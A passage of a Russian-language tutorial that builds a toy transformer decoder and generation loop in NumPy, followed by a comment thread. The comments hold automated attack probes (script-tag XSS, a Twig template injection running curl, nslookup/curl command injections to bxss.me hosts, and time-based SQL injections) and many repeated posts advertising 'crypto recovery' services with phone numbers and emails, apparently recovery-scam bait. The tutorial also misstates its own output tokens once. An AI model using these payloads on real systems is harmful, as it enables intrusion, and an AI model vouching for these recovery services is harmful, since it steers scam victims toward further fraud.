Z_self_attention = multi_head_attention(E, WQs, WKs, WVs)
Z_self_attention
array([[ 2.19334924, 10.61851198, -4.50089666, -2.76366551]])

Примечание

С точки зрения инференса всё довольно просто, однако с точки зрения обучения есть сложности. При обучении мы используем неразмеченные данные: просто кучу текстовых данных, которые собираем частым скрейпингом в вебе. Цель кодировщика — передача всей информации входных данных, а задача декодера —предсказание следующего наиболее вероятного токена. Это значит, что декодер может использовать только ранее сгенерированные токены (он не может схитрить и посмотреть следующие токены).

Из-за этого мы используем маскированное самовнимание: маскируем ещё не сгенерированные токены. Это выполняется присвоением показателям внимания значений -inf. Так делается в научной статье (раздел 3.2.3.1). Пока мы это пропустим, но важно помнить, что при обучении декодер чуть сложнее.

5. Остаточные связи и нормализация слоёв

Здесь нет ничего таинственного, мы просто складываем входные данные с выходными данными самовнимания и применяем нормализацию слоя. Используется тот же код, что и выше.

Z_self_attention = layer_norm(Z_self_attention + E)
Z_self_attention
array([[ 0.17236212,  1.54684892, -1.0828824 , -0.63632864]])

6. Внимание кодировщика-декодера

Эта часть новая! Если вы задавались вопросом, куда направляются генерируемые кодировщиком эмбеддинги, то сейчас самое время для них!

Предположим, что выходными данными кодировщика является такая матрица:

fc2024fb11fec40a9e7153c6615fc0ce.png

В механизме самовнимания мы вычисляем запросы, ключи и значения для входного эмбеддинга.

Во внимании кодировщика-декодера мы вычисляем запросы из предыдущего слоя декодера и ключи и значения из выходных данных кодировщика! Все вычисления остаются такими же, что и раньше; единственное отличие в том, какой эмбеддинг использовать для запросов. Давайте взглянем на код

def encoder_decoder_attention(encoder_output, attention_input, WQ, WK, WV):
    # В следующих трёх строках и состоит основное различие!
    K = encoder_output @ WK    # Обратите внимание, что теперь мы передаём предыдущие выходные данные кодировщика!
    V = encoder_output @ WV    # Обратите внимание, что теперь мы передаём предыдущие выходные данные кодировщика!
    Q = attention_input @ WQ   # То же, что и для самовнимания

    # Остаётся таким же
    scores = Q @ K.T
    scores = scores / np.sqrt(d_key)
    scores = softmax(scores)
    scores = scores @ V
    return scores


def multi_head_encoder_decoder_attention(
    encoder_output, attention_input, WQs, WKs, WVs
):
    # Обратите внимание, что теперь мы передаём предыдущие выходные данные кодировщика!
    attentions = np.concatenate(
        [
            encoder_decoder_attention(
                encoder_output, attention_input, WQ, WK, WV
            )
            for WQ, WK, WV in zip(WQs, WKs, WVs)
        ],
        axis=1,
    )
    W = np.random.randn(n_attention_heads * d_value, d_embedding)
    return attentions @ W
WQs = [np.random.randn(d_embedding, d_query) for _ in range(n_attention_heads)]
WKs = [np.random.randn(d_embedding, d_key) for _ in range(n_attention_heads)]
WVs = [np.random.randn(d_embedding, d_value) for _ in range(n_attention_heads)]

encoder_output = np.array([[-1.5, 1.0, -0.8, 1.5], [1.0, -1.0, -0.5, 1.0]])

Z_encoder_decoder = multi_head_encoder_decoder_attention(
    encoder_output, Z_self_attention, WQs, WKs, WVs
)
Z_encoder_decoder
array([[ 1.57651431,  4.92489307, -0.08644448, -0.46776051]])

Сработало! Возможно, вы зададитесь вопросом: «зачем мы это делаем?». Дело в том, что мы хотим, чтобы декодер сосредоточился на релевантных частях входного текста (то есть «hello world»). Внимание кодировщика-декодера позволяет каждой позиции в декодере посетить все позиции входной последовательности. Это очень полезно для таких задач, как перевод, когда декодеру нужно сосредоточиться на релевантных частях входной последовательности. Декодер будет учиться сосредотачиваться на релевантных частях входной последовательности, учась генерировать правильные выходные токены. Это очень мощный механизм!

7. Остаточные связи и нормализация слоя

Всё то же, что и раньше!

Z_encoder_decoder = layer_norm(Z_encoder_decoder + Z_self_attention)
Z_encoder_decoder
array([[-0.44406723,  1.6552893 , -0.19984632, -1.01137575]])

8. Слой с прямой связью

И тут то же самое! После этого я также выполню остаточную связь и нормализацию слоя.

W1 = np.random.randn(4, 8)
W2 = np.random.randn(8, 4)
b1 = np.random.randn(8)
b2 = np.random.randn(4)

output = layer_norm(feed_forward(Z_encoder_decoder, W1, b1, W2, b2) + Z_encoder_decoder)
output
array([[-0.97650182,  0.81470137, -2.79122044, -3.39192873]])

9. Объединяем всё: произвольный декодер

Давайте напишем код для одного блока декодера. Самое главное изменение заключается в том, что теперь у нас есть дополнительный механизм внимания.

d_embedding = 4
d_key = d_value = d_query = 3
d_feed_forward = 8
n_attention_heads = 2
encoder_output = np.array([[-1.5, 1.0, -0.8, 1.5], [1.0, -1.0, -0.5, 1.0]])

def decoder_block(
    x,
    encoder_output,
    WQs_self_attention, WKs_self_attention, WVs_self_attention,
    WQs_ed_attention, WKs_ed_attention, WVs_ed_attention,
    W1, b1, W2, b2,
):
    # То же, что и раньше
    Z = multi_head_attention(
        x, WQs_self_attention, WKs_self_attention, WVs_self_attention
    )
    Z = layer_norm(Z + x)

    # Основное различие заключается в следующих трёх строках!
    Z_encoder_decoder = multi_head_encoder_decoder_attention(
        encoder_output, Z, WQs_ed_attention, WKs_ed_attention, WVs_ed_attention
    )
    Z_encoder_decoder = layer_norm(Z_encoder_decoder + Z)

    # То же, что и раньше
    output = feed_forward(Z_encoder_decoder, W1, b1, W2, b2)
    return layer_norm(output + Z_encoder_decoder)

def random_decoder_block(x, encoder_output):
    # Просто несколько произвольных инициализаций
    WQs_self_attention = [
        np.random.randn(d_embedding, d_query) for _ in range(n_attention_heads)
    ]
    WKs_self_attention = [
        np.random.randn(d_embedding, d_key) for _ in range(n_attention_heads)
    ]
    WVs_self_attention = [
        np.random.randn(d_embedding, d_value) for _ in range(n_attention_heads)
    ]

    WQs_ed_attention = [
        np.random.randn(d_embedding, d_query) for _ in range(n_attention_heads)
    ]
    WKs_ed_attention = [
        np.random.randn(d_embedding, d_key) for _ in range(n_attention_heads)
    ]
    WVs_ed_attention = [
        np.random.randn(d_embedding, d_value) for _ in range(n_attention_heads)
    ]

    W1 = np.random.randn(d_embedding, d_feed_forward)
    b1 = np.random.randn(d_feed_forward)
    W2 = np.random.randn(d_feed_forward, d_embedding)
    b2 = np.random.randn(d_embedding)


    return decoder_block(
        x, encoder_output,
        WQs_self_attention, WKs_self_attention, WVs_self_attention,
        WQs_ed_attention, WKs_ed_attention, WVs_ed_attention,
        W1, b1, W2, b2,
    )
def decoder(x, decoder_embedding, n=6):
    for _ in range(n):
        x = random_decoder_block(x, decoder_embedding)
    return x

decoder(E, encoder_output)
array([[ 0.25919176,  1.49913566, -1.14331487, -0.61501256],
       [ 0.25956188,  1.49896896, -1.14336934, -0.61516151]])

Генерация выходной последовательности

У нас уже есть все необходимые части! Давайте сгенерируем выходную последовательность.

  • У нас есть кодировщик, получающий входную последовательность и генерирующий его обогащённое описание. Он состоит из стека блоков кодировщиков.

  • У нас есть декодер, получающий выходные данные кодировщика и сгенерированные токены и генерирующий выходную последовательность. Он состоит из стека блоков декодеров.

Как перейти от выходных данных декодера к слову? Нужно добавить поверх декодера последний линейный слой и слой softmax. Весь алгоритм в целом выглядит так:

  1. Обработка кодировщиком: кодировщик получает входную последовательность и генерирует контекстуализированное описание всего предложения при помощи стека блоков кодировщиков.

  2. Инициализация декодера: процесс декодирования начинается с эмбеддинга токена SOS (Start of Sequence), соединённого с выходными данными кодировщика.

  3. Работа декодера: декодер использует выходные данные кодировщика и эмбеддинги всех ранее сгенерированных токенов для создания нового списка эмбеддингов.

  4. Линейный слой для логитов: линейный слой применяется к последнему выходному эмбеддингу декодера для генерации логитов, представляющих сырые предсказания следующего токена.

  5. Softmax для вероятностей: затем эти логиты передаются через слой softmax, преобразующий их в распределение вероятностей по потенциальным следующим токенам.

  6. Итеративная генерация токенов: этот процесс повторяется, и на каждом этапе декодер генерирует следующий токен на основании кумулятивных эмбеддингов ранее сгенерированных токенов и исходных выходных данных кодировщика.

  7. Формирование предложения: эти этапы генерации продолжаются, пока не будет создан токен EOS (End of Sequence) или не достигнута заранее заданная максимальная длина предложения.

Об этом говорится в разделе 3.4 научной статьи.

1. Линейный слой

Линейный слой — это простое линейное преобразование. Он получает выходные данные декодера и преобразует их в вектор размера vocab_size. Это размер словаря. Например, если у нас есть словарь из 10000 слов, то линейный слой преобразовал бы выходные данные декодера в вектор размера 10000. Этот вектор содержал бы вероятность того, что каждое слово будет следующим словом в последовательности. Для простоты можно начать со словаря из 10 слов и предположить, что первые выходные данные декодера — это очень простой вектор: [1, 0, 1, 0]. Мы используем произвольные веса и матрицы перекосов размера vocab_size x decoder_output_size.

def linear(x, W, b):
    return np.dot(x, W) + b

x = linear([1, 0, 1, 0], np.random.randn(4, 10), np.random.randn(10))
x
array([ 0.06900542, -1.81351091, -1.3122958 , -0.33197364,  2.54767851,
       -1.55188231,  0.82907169,  0.85910931, -0.32982856, -1.26792439])

Примечание

Что используется в качестве входных данных для линейного слоя? Декодер будет выводить по одному эмбеддингу для каждого токена в последовательности. Входными данными для линейного слоя станет последний сгенерированный эмбеддинг. Последний эмбеддинг включает в себя информацию для всей последовательности до этого этапа, то есть содержит всю информацию, необходимую для генерации следующего токена. Это значит, что каждый выходной эмбеддинг декодера содержит информацию о всей последовательности до этого этапа.

2. Softmax

Они называются логитами, но интерпретировать их не так просто. Для получения вероятностей можно применить функцию softmax.

softmax(x)
array([[0.01602618, 0.06261303, 0.38162024, 0.03087794, 0.0102383 ,
        0.00446011, 0.01777314, 0.00068275, 0.46780959, 0.00789871]])

И так мы получили вероятности! Предположим, словарь имеет такой вид:

af1ce2cd67a1bfc1e3def62b9b09cc96.png

Мы видим, что вероятности таковы:

  • hello: 0.01602618

  • mundo: 0.06261303

  • world: 0.38162024

  • how: 0.03087794

  • ?: 0.0102383

  • EOS: 0.00446011

  • SOS: 0.01777314

  • a: 0.00068275

  • hola: 0.46780959

  • c: 0.00789871

Из этого видно, что наиболее вероятный следующий токен — это «hola». Если всегда выбирается наиболее вероятный токен, это называется жадным декодингом. Это не всегда наилучший подход, потому что он может привести к субоптимальным результатам, но пока мы не будем сейчас углубляться в методики генерации. Если хотите узнать о них подробнее, то прочитайте потрясающий пост.

3. Случайный трансформер из кодировщика и декодера

Давайте напишем код целиком. Зададим словарь, сопоставляющий слова с их изначальными эмбеддингами. Надо отменить, что это тоже изучается при обучении, но пока мы используем случайные значения.

vocabulary = [
    "hello",
    "mundo",
    "world",
    "how",
    "?",
    "EOS",
    "SOS",
    "a",
    "hola",
    "c",
]
embedding_reps = np.random.randn(10, 4)
vocabulary_embeddings = {
    word: embedding_reps[i] for i, word in enumerate(vocabulary)
}
vocabulary_embeddings
{'hello': array([-0.32106406,  2.09332588, -0.77994069,  0.92639774]),
 'mundo': array([-0.59563791, -0.63389256,  1.70663692, -0.99495115]),
 'world': array([ 1.35581862, -0.0323546 ,  2.76696887,  0.83069982]),
 'how': array([-0.52975474,  0.94439644,  0.80073818, -1.50135518]),
 '?': array([-0.88116833,  0.13995055,  2.01827674, -0.52554391]),
 'EOS': array([1.12207024, 1.40905796, 1.22231714, 0.02267638]),
 'SOS': array([-0.60624082, -0.67560165,  0.77152125,  0.63472247]),
 'a': array([ 1.67622229, -0.20319309, -0.18324905, -0.24258774]),
 'hola': array([ 1.07809402, -0.83846408, -0.33448976,  0.28995976]),
 'c': array([ 0.65643157,  0.24935726, -0.80839751, -1.87156293])}

А теперь напишем произвольный метод generate , авторегрессивно генерирующий токены.

def generate(input_sequence, max_iters=3):
    # Сначала мы кодируем входные данные в эмбеддинги
    # Для простоты мы пропустим этап позиционного кодирования
    embedded_inputs = [
        vocabulary_embeddings[token] for token in input_sequence
    ]
    print("Embedding representation (encoder input)", embedded_inputs)

    # Затем генерируем описание эмбеддинга
    encoder_output = encoder(embedded_inputs)
    print("Embedding generated by encoder (encoder output)", encoder_output)

    # Инициализируем выходные данные декодера эмбеддингом начального токена
    sequence_embeddings = [vocabulary_embeddings["SOS"]]
    output = "SOS"
    
    # Случайные матрицы для линейного слоя
    W_linear = np.random.randn(d_embedding, len(vocabulary))
    b_linear = np.random.randn(len(vocabulary))

    # Мы ограничиваем количество этапов декодинга, чтобы избежать слишком последовательностей без EOS
    for i in range(max_iters):
        # Этап декодера
        decoder_output = decoder(sequence_embeddings, encoder_output)

        # Используем для предсказания только последние выходные данные
        logits = linear(decoder_output[-1], W_linear, b_linear)
        # Обёртываем логиты в список, потому что softmax нужны пакеты/2D-массив
        probs = softmax([logits])

        # Получаем наиболее вероятный следующий токен
        next_token = vocabulary[np.argmax(probs)]
        sequence_embeddings.append(vocabulary_embeddings[next_token])
        output += " " + next_token

        print(
            "Iteration", i, 
            "next token", next_token,
            "with probability of", np.max(probs),
        )

        # Если следующий токен последний, то возвращаем последовательность
        if next_token == "EOS":
            return output

    return output, sequence_embeddings

Давайте запустим код!

generate(["hello", "world"])
Embedding representation (encoder input) [array([-0.32106406,  2.09332588, -0.77994069,  0.92639774]), array([ 1.35581862, -0.0323546 ,  2.76696887,  0.83069982])]
Embedding generated by encoder (encoder output) [[ 1.14747807 -1.5941759   0.36847675  0.07822107]
 [ 1.14747705 -1.59417696  0.36847441  0.07822551]]
Iteration 0 next token hola with probability of 0.4327111653266739
Iteration 1 next token mundo with probability of 0.4411354383451089
Iteration 2 next token world with probability of 0.4746898792307499
('SOS hola mundo world',
 [array([-0.60624082, -0.67560165,  0.77152125,  0.63472247]),
  array([ 1.07809402, -0.83846408, -0.33448976,  0.28995976]),
  array([-0.59563791, -0.63389256,  1.70663692, -0.99495115]),
  array([ 1.35581862, -0.0323546 ,  2.76696887,  0.83069982])])

Отлично, теперь у нас есть токены «how», «a» и «c». Это неправильный перевод, но этого вполне можно было ожидать, ведь веса мы использовали случайные.

Советую ещё раз подробно изучить всю архитектуру кодировщика-декодера из научной статьи:

Кодировщик и декодер
Кодировщик и декодер

Заключение

Надеюсь, пост показался вам интересным и информативным! Мы рассмотрели множество аспектов. Но разве это всё? На самом деле, практически да! В архитектуры новых трансформеров добавляют множество трюков, но фундамент трансформера именно таков, каким мы его описали. В зависимости от задачи также можно использовать только кодировщик или декодер. Например, в задачах, требующих понимания, например, в классификации, можно использовать стек кодировщиков с линейным слоем поверх него. Для задач, требующих генерации, например, в переводе, можно использовать стеки кодировщиков и декодеров. А для свободной генерации, например, как в ChatGPT или Mistral, можно применять только стек декодеров.

Разумеется, мы многое упростили. Давайте вкратце проверим, какие были числа в научной статье о трансформере:

  • Размерность эмбеддингов: 512 (в нашем примере 4)

  • Количество кодировщиков: 6 (в нашем примере 6)

  • Количество декодеров: 6 (в нашем примере 6)

  • Размерность прямой связи: 2048 (в нашем примере 8)

  • Количество голов внимания: 8 (в нашем примере 2)

  • Размерность внимания: 64 (в нашем примере 3)

Мы рассмотрели множество тем, но довольно интересно, то мы можем достичь впечатляющих результатов, увеличив масштабы этих вычислений и проведя умное обучение. Мы не рассмотрели в посте обучение, потому что наша цель заключалась в понимании вычислений при использовании готовой модели, но я надеюсь, что это станет надёжным фундаментом для перехода к обучению!

Также можно найти более формальный документ с вычислениями в этом PDF.

Упражнения

Вот несколько упражнений, чтобы попрактиковаться в понимании трансформера.

  1. В чём предназначение позиционного кодирования?

  2. Чем отличаются самовнимание и внимание кодировщика-декодера?

  3. Что произойдёт, если размерность внимания слишком мала? А если слишком велика?

  4. Вкратце опишите структуру слоя с прямой связью.

  5. Почему декодер медленнее кодировщика?

  6. Какова цель остаточных связей и нормализации слоёв?

  7. Как выполняется переход от выходных данных декодера к вероятностям?

  8. Почему выбор каждый раз самого вероятного следующего токена может вызвать проблемы?

Ресурсы

Источник

  • 09.10.25 08:11 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}

  • 09.10.25 08:13 pHqghUme

    '"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?9425407

  • 09.10.25 08:13 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:14 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:16 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    "+response.write(9043995*9352716)+"

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    $(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    |(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)

  • 09.10.25 08:18 pHqghUme

    |(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:19 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:22 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:23 pHqghUme

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  • 09.10.25 08:24 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:24 pHqghUme

    e

  • 09.10.25 08:24 pHqghUme

    can I ask you a question please?-1 waitfor delay '0:0:15' --

  • 09.10.25 08:25 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --

  • 09.10.25 08:26 pHqghUme

    can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--

  • 09.10.25 08:26 pHqghUme

    e

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'"

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:28 pHqghUme

    @@olQP6

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891 from DUAL)

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891)

  • 09.10.25 08:30 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:33 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:35 pHqghUme

    e

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:40 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:40 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:41 pHqghUme

    e

  • 09.10.25 08:41 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:42 pHqghUme

    e

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 11.10.25 04:41 luciajessy3

    Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…

  • 11.10.25 10:44 Tonerdomark

    A thief took my Dogecoin and wrecked my life. Then Mr. Sylvester stepped in and changed everything. He got back €211,000 for me, every single cent of my gains. His calm confidence and strong tech skills rebuilt my trust. Thanks to him, I recovered my cash with no issues. After months of stress, I felt huge relief. I had full faith in him. If a scam stole your money, reach out to him today at { yt7cracker@gmail . com } His help sparked my full turnaround.

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 19:53 Tonerdomark

    A crook swiped my Dogecoin. It ruined my whole world. Then Mr. Sylvester showed up. He fixed it all. He pulled back €211,000 for me. Not one cent missing from my profits. His steady cool and sharp tech know-how won back my trust. I got my money smooth and sound. After endless worry, relief hit me hard. I trusted him completely. Lost cash to a scam? Hit him up now at { yt7cracker@gmail . com }. His aid turned my life around. WhatsApp at +1 512 577 7957.

  • 12.10.25 21:36 blessing

    Writing this review is a joy. Marie has provided excellent service ever since I started working with her in early 2018. I was worried I wouldn't be able to get my coins back after they were stolen by hackers. I had no idea where to begin, therefore it was a nightmare for me. However, things became easier for me after my friend sent me to [email protected] and +1 7127594675 on WhatsApp. I'm happy that she was able to retrieve my bitcoin so that I could resume trading.

  • 13.10.25 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 13.10.25 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 